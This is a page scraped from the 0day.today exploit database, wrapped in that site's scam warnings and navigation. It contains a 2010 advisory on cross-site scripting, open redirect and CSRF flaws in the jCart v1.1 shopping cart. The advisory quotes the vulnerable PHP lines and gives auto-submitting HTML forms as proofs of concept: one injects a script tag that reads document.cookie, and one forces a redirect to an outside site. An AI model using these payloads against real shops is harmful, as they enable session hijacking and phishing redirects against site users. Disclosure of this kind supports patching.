0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
jCart v1.1 Multiple XSS/CSRF/Open Redirect Vulnerabilities
========================================================== jCart v1.1 Multiple XSS/CSRF/Open Redirect Vulnerabilities ========================================================== <!-- Exploit Title: jCart v1.1 Multiple XSS/CSRF/Open Redirect Vulnerabilities Date: 25.07.2010 Author: p0deje Software Link: http://conceptlogic.com/jcart/ Version: <=1.1 Tested on: OS Independent CVE : -- --> <!-- 1. Cross-site Scripting --> <!-- Vulnerable code snippet: jcart.php ------------------------- line 251: $item_name = $_POST[$item_name]; ... line 256: $item_added = $this->add_item($item_id, $item_qty, $item_price, $item_name); ------------------------- User-supplied input for variable $item_name isn't properly escaped. Proof-of-Concept: --> <html> <form action="http://evil.host/jcart-1.1/jcart/jcart-relay.php" method="POST"> <input name="my-item-id" value="3" type="hidden"> <input name="my-item-qty" value="1" type="hidden"> <input name="my-item-name" value="<script>alert(document.cookie)</script>" type="hidden"> <input name="my-item-price" value="33.25" type="hidden"> <input id="payload" name="my-add-button" value="add to cart" class="button" type="submit"> </form> <script> document.getElementById('payload').click() </script> </html> <!-- 2. Cross-site Scripting / Open Redirect --> <!-- Vulnerable code snippet jcart-gateway.php: ------------------------- line 41: header('Location: ' . $_POST['jcart_checkout_page']); ------------------------- User-supplied data is not properly escaped before passing to header() function. Proof-of-Concept: --> <html> <form action="http://evil.host/jcart-1.1/jcart/jcart-gateway.php" method="POST"> <input name="jcart_checkout_page" value="http://www.google.com" type="hidden"> <input id="payload" name="my-add-button" value="add to cart" class="button" type="submit"> </form> <script> document.getElementById('payload').click() </script> </html> <!-- 3. Cross-site Request Forgery --> <!-- All requests of jCart are vulnerable to CSRF. Proof-of-Concept goes the same as for the first or the second vulnerability. --> # 0day.today [2024-12-23] #